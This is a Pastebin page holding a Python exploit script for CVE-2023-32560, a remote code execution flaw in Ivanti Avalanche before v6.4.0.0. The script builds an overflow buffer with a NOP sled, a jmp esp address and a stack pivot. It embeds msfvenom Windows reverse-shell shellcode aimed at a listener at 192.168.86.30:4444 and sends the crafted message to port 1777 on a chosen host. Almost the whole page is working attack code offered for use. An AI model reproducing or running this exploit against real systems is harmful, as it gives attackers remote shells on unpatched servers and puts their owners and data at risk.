API tools faq
paste
Advertisement
FlyFar

Ivanti Avalanche <v6.4.0.0 - Remote Code Execution - CVE-2023-32560

FlyFar
Jan 21st, 2024
939
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 4.01 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. """
  2. Exploit Title: Ivanti Avalanche <v6.4.0.0 - Remote Code Execution
  3. Date: 2023-08-16
  4. Exploit Author: Robel Campbell (@RobelCampbell)
  5. Vendor Homepage: https://www.ivanti.com/
  6. Software Link: https://www.wavelink.com/download/Downloads.aspx?DownloadFile=27550&returnUrl=/Download-Avalanche_Mobile-Device-Management-Software/
  7. Version: v6.4.0.0
  8. Tested on: Windows 11 21H2
  9. CVE: CVE-2023-32560
  10. Reference: https://www.tenable.com/security/research/tra-2023-27
  11. """
  12.  
  13. import socket
  14. import struct
  15. import sys
  16.  
  17. # Create an item structure for the header and payload
  18. class Item:
  19.     def __init__(self, type_, name, value):
  20.         self.type = type_
  21.         self.name = name.encode()
  22.         self.value = value
  23.         self.name_size = 0x5
  24.         self.value_size = 0x800
  25.  
  26.     def pack(self):
  27.         return struct.pack('>III{}s{}s'.format(self.name_size, self.value_size),
  28.                            self.type, self.name_size, self.value_size, self.name, self.value)
  29.  
  30. # Create a header structure
  31. class HP:
  32.     def __init__(self, hdr, payload):
  33.         self.hdr = hdr
  34.         self.payload = payload
  35.         self.pad = b'\x00' * (16 - (len(self.hdr) + len(self.payload)) % 16)
  36.  
  37.     def pack(self):
  38.         return b''.join([item.pack() for item in self.hdr]) + \
  39.                b''.join([item.pack() for item in self.payload]) + self.pad
  40.  
  41. # Create a preamble structure
  42. class Preamble:
  43.     def __init__(self, hp):
  44.         self.msg_size = len(hp.pack()) + 16
  45.         self.hdr_size = sum([len(item.pack()) for item in hp.hdr])
  46.         self.payload_size = sum([len(item.pack()) for item in hp.payload])
  47.         self.unk = 0  # Unknown value
  48.  
  49.     def pack(self):
  50.         return struct.pack('>IIII', self.msg_size, self.hdr_size, self.payload_size, self.unk)
  51.  
  52. # Create a message structure
  53. class Msg:
  54.     def __init__(self, hp):
  55.         self.pre = Preamble(hp)
  56.         self.hdrpay = hp
  57.  
  58.     def pack(self):
  59.         return self.pre.pack() + self.hdrpay.pack()
  60.  
  61. # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.86.30 LPORT=4444 exitfunc=thread -f python
  62. shellcode =  b""
  63. shellcode += b"fce8820000006089e531c064"
  64. shellcode += b"8b50308b520c8b52148b7228"
  65. shellcode += b"0fb74a2631ffac3c617c022c"
  66. shellcode += b"20c1cf0d01c7e2f252578b52"
  67. shellcode += b"108b4a3c8b4c1178e34801d1"
  68. shellcode += b"518b592001d38b4918e33a49"
  69. shellcode += b"8b348b01d631ffacc1cf0d01"
  70. shellcode += b"c738e075f6037df83b7d2475"
  71. shellcode += b"e4588b582401d3668b0c4b8b"
  72. shellcode += b"581c01d38b048b01d0894424"
  73. shellcode += b"245b5b61595a51ffe05f5f5a"
  74. shellcode += b"8b12eb8d5d68333200006877"
  75. shellcode += b"73325f54684c772607ffd5b8"
  76. shellcode += b"9001000029c454506829806b"
  77. shellcode += b"00ffd5505050504050405068"
  78. shellcode += b"ea0fdfe0ffd5976a0568c0a8"
  79. shellcode += b"561e680200115c89e66a1056"
  80. shellcode += b"576899a57461ffd585c0740c"
  81. shellcode += b"ff4e0875ec68f0b5a256ffd5"
  82. shellcode += b"68636d640089e357575731f6"
  83. shellcode += b"6a125956e2fd66c744243c01"
  84. shellcode += b"018d442410c6004454505656"
  85. shellcode += b"5646564e565653566879cc3f"
  86. shellcode += b"86ffd589e04e5646ff306808"
  87. shellcode += b"871d60ffd5bbe01d2a0a68a6"
  88. shellcode += b"95bd9dffd53c067c0a80fbe0"
  89. shellcode += b"7505bb4713726f6a0053ffd5"
  90.  
  91. buf = b'90' * 340
  92. buf += b'812b4100' # jmp esp (0x00412b81)
  93. buf += b'90909090'
  94. buf += b'90909090'
  95. buf += shellcode
  96. buf += b'41' * 80
  97. buf += b'84d45200' # stack pivot: add esp, 0x00000FA0 ; retn 0x0004 ; (0x0052d484)
  98. buf += b'43' * (0x800 - len(buf))
  99.  
  100. buf2 = b'41' * 0x1000
  101.  
  102. # Create message payload
  103. hdr = [Item(3, "pwned", buf)]
  104. payload = [Item(3, "pwned", buf2)] # dummy payload, probabaly not necessary
  105. hp_instance = HP(hdr, payload)
  106. msg_instance = Msg(hp_instance)
  107.  
  108. # Default port
  109. port = 1777
  110.  
  111. # check for target host argument
  112. if len(sys.argv) > 1:
  113.     host = sys.argv[1]
  114. else:
  115.     print("Usage: python3 CVE-2023-32560.py <host ip>")
  116.     sys.exit()
  117.  
  118. with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
  119.     s.connect((host, port))
  120.     s.sendall(msg_instance.pack())
  121.     print("Message sent!")
  122.     s.close()
  123.            
Tags: Exploit Vulnerability
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!